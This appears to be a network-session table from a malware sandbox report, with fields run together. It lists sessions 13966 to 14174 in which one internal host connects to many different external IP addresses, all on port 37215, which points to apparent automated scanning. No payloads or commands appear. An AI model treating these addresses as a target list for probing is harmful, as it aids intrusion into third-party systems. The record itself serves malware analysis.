                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13966192.168.2.133669641.225.149.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13967192.168.2.134470440.47.200.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13968192.168.2.1333834197.165.253.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13969192.168.2.1355888197.143.249.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13970192.168.2.1347086110.84.196.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13971192.168.2.1346986197.207.144.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13972192.168.2.136006441.118.152.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13973192.168.2.1348976168.154.138.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13974192.168.2.1357476157.199.190.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13975192.168.2.1341488157.121.86.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13976192.168.2.135296458.246.216.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13977192.168.2.1357102157.5.214.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13978192.168.2.134779231.173.64.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13979192.168.2.1335200157.248.36.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13980192.168.2.134262241.79.220.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13981192.168.2.1333948157.168.216.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13982192.168.2.1353896197.63.114.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13983192.168.2.1355776130.119.195.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13984192.168.2.1357528197.139.147.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13985192.168.2.1355122125.198.21.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13986192.168.2.135710441.212.213.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13987192.168.2.1360332197.32.52.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13988192.168.2.1346860157.62.72.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13989192.168.2.134432841.235.227.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13990192.168.2.1339348197.144.209.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13991192.168.2.1353350157.72.225.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13992192.168.2.135260041.76.174.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13993192.168.2.133375462.153.144.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13994192.168.2.1345970197.145.252.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13995192.168.2.133296841.114.231.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13996192.168.2.134170683.79.190.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13997192.168.2.1353342197.96.178.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13998192.168.2.1335026185.18.185.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13999192.168.2.134499446.14.185.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14000192.168.2.135507041.45.238.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14001192.168.2.134765654.211.40.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14002192.168.2.1350786197.38.80.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14003192.168.2.1345240157.17.97.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14004192.168.2.1357240157.223.184.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14005192.168.2.1350268197.194.107.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14006192.168.2.1334612157.220.220.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14007192.168.2.135899441.123.5.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14008192.168.2.1354026197.13.150.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14009192.168.2.1356874114.10.101.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14010192.168.2.1359182169.49.192.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14011192.168.2.1352016106.34.12.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14012192.168.2.135644241.159.63.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14013192.168.2.1343472213.101.233.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14014192.168.2.133821241.183.206.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14015192.168.2.136084412.172.53.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14016192.168.2.1343672155.9.225.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14017192.168.2.1354332120.1.189.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14018192.168.2.133715868.165.2.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14019192.168.2.134754841.237.169.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14020192.168.2.1333642168.64.233.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14021192.168.2.1341246197.163.109.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14022192.168.2.1335232157.244.68.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14023192.168.2.1347436197.28.1.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14024192.168.2.134556641.10.105.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14025192.168.2.133952271.162.113.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14026192.168.2.1354054157.189.87.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14027192.168.2.1360144157.110.247.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14028192.168.2.1345898197.41.87.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14029192.168.2.1351742197.253.93.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14030192.168.2.1359380117.21.129.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14031192.168.2.1333774197.121.246.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14032192.168.2.1353796197.189.193.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14033192.168.2.1353708193.163.43.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14034192.168.2.133562241.179.78.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14035192.168.2.133753241.149.18.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14036192.168.2.1349434103.187.207.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14037192.168.2.1339438197.59.154.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14038192.168.2.1345348200.113.127.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14039192.168.2.1348784157.204.196.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14040192.168.2.1343508123.149.204.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14041192.168.2.1357406197.181.130.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14042192.168.2.135562641.61.142.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14043192.168.2.1341212197.16.164.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14044192.168.2.135576469.104.195.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14045192.168.2.1345212197.125.210.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14046192.168.2.134069441.145.137.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14047192.168.2.135461067.74.108.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14048192.168.2.1339170157.179.170.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14049192.168.2.135791081.68.133.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14050192.168.2.1338040157.224.10.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14051192.168.2.1338230197.83.110.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14052192.168.2.1346672157.14.218.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14053192.168.2.134509441.233.82.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14054192.168.2.1346810197.122.200.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14055192.168.2.133396041.208.29.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14056192.168.2.133712859.176.34.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14057192.168.2.1358496193.3.65.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14058192.168.2.1355170197.122.166.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14059192.168.2.1356828157.169.26.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14060192.168.2.1341232197.70.156.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14061192.168.2.133914067.84.75.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14062192.168.2.1354258157.184.120.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14063192.168.2.1360288157.163.173.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14064192.168.2.1360506157.15.125.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14065192.168.2.1355204155.158.215.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14066192.168.2.1347720197.63.191.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14067192.168.2.136032867.132.123.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14068192.168.2.133574841.92.237.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14069192.168.2.1341162133.113.97.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14070192.168.2.1333872155.82.59.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14071192.168.2.1356822197.165.23.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14072192.168.2.1342960157.167.26.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14073192.168.2.1345260197.121.181.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14074192.168.2.1359510197.161.149.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14075192.168.2.1357982157.235.182.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14076192.168.2.133317245.191.126.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14077192.168.2.135172441.255.228.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14078192.168.2.1339292157.44.68.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14079192.168.2.1349524157.71.161.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14080192.168.2.134078282.188.23.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14081192.168.2.1335324197.173.201.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14082192.168.2.1350988104.0.106.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14083192.168.2.133418241.149.157.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14084192.168.2.1334364157.205.115.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14085192.168.2.1352288157.185.92.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14086192.168.2.1355316197.105.185.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14087192.168.2.134954641.119.192.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14088192.168.2.1353936197.210.9.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14089192.168.2.1357710157.142.117.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14090192.168.2.134878041.214.199.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14091192.168.2.1346334197.51.85.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14092192.168.2.135713041.68.130.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14093192.168.2.133367441.192.101.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14094192.168.2.135969841.35.156.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14095192.168.2.1335508197.9.76.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14096192.168.2.1359078197.84.149.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14097192.168.2.1358628197.64.12.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14098192.168.2.1333188197.169.128.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14099192.168.2.1349506157.34.22.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14100192.168.2.1337358168.56.173.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14101192.168.2.134477441.171.156.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14102192.168.2.1345358197.135.143.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14103192.168.2.135347441.226.15.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14104192.168.2.1352102197.198.53.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14105192.168.2.134818041.235.222.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14106192.168.2.133594498.118.150.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14107192.168.2.1352942197.119.238.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14108192.168.2.1359062157.234.74.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14109192.168.2.1343700197.221.48.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14110192.168.2.133494041.177.20.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14111192.168.2.1342918197.84.118.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14112192.168.2.1357818197.231.158.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14113192.168.2.1357706157.79.28.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14114192.168.2.135853241.57.240.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14115192.168.2.134213241.250.224.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14116192.168.2.1355554197.194.194.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14117192.168.2.1356072196.245.152.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14118192.168.2.135514620.76.87.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14119192.168.2.134958619.117.40.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14120192.168.2.1338468197.93.174.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14121192.168.2.135196241.84.255.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14122192.168.2.136004245.11.212.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14123192.168.2.135071441.186.169.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14124192.168.2.135143441.85.58.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14125192.168.2.1342072157.44.211.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14126192.168.2.135148241.82.103.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14127192.168.2.1342978197.195.157.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14128192.168.2.1340176197.1.205.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14129192.168.2.1353378129.222.15.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14130192.168.2.1345452157.45.166.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14131192.168.2.1352706197.40.81.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14132192.168.2.1345942157.94.230.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14133192.168.2.1350856197.88.39.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14134192.168.2.13583688.167.128.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14135192.168.2.1340466213.124.106.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14136192.168.2.1355664157.187.131.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14137192.168.2.134972841.114.115.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14138192.168.2.135117841.138.237.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14139192.168.2.134394825.102.219.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14140192.168.2.134030477.232.71.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14141192.168.2.1359640197.1.48.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14142192.168.2.1360170157.160.30.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14143192.168.2.1360436157.24.109.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14144192.168.2.1347520139.252.23.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14145192.168.2.1354132197.152.69.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14146192.168.2.1356706197.73.219.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14147192.168.2.1354212157.146.190.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14148192.168.2.1356664157.79.145.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14149192.168.2.133477441.74.63.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14150192.168.2.1358500102.197.4.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14151192.168.2.134365262.101.222.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14152192.168.2.1334024157.118.112.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14153192.168.2.1332962197.125.228.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14154192.168.2.1344422121.196.105.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14155192.168.2.1348398137.2.187.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14156192.168.2.133710241.95.73.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14157192.168.2.1345748197.59.5.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14158192.168.2.1337240157.238.89.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14159192.168.2.1342852157.74.128.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14160192.168.2.1356556197.183.221.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14161192.168.2.1339400197.117.203.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14162192.168.2.1336414141.79.88.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14163192.168.2.1358522197.173.152.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14164192.168.2.1337624205.129.41.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14165192.168.2.135716450.2.175.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14166192.168.2.135903664.9.121.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14167192.168.2.135203041.51.214.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14168192.168.2.1340732169.236.57.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14169192.168.2.1350164157.204.122.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14170192.168.2.1353538197.72.85.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14171192.168.2.1343870197.109.115.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14172192.168.2.1346506197.78.185.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14173192.168.2.1354444132.216.185.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14174192.168.2.1336164197.138.114.7037215
                                                  TimestampBytes transferredDirectionData


